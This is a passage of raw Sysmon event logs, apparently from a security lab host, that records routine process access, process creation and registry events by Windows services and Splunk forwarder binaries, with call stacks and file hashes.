Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-9058-6005-1901-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9059-6005-1B01-00000000A301}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9059-6005-1B01-00000000A301}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9059-6005-1B01-00000000A301}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.973{59A5CD1D-9059-6005-1B01-00000000A301}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000005095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:43:15.566{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9f-0xdf4888eb) 10341000x80000000000000005108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9090-6005-1C01-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9090-6005-1C01-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9090-6005-1C01-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 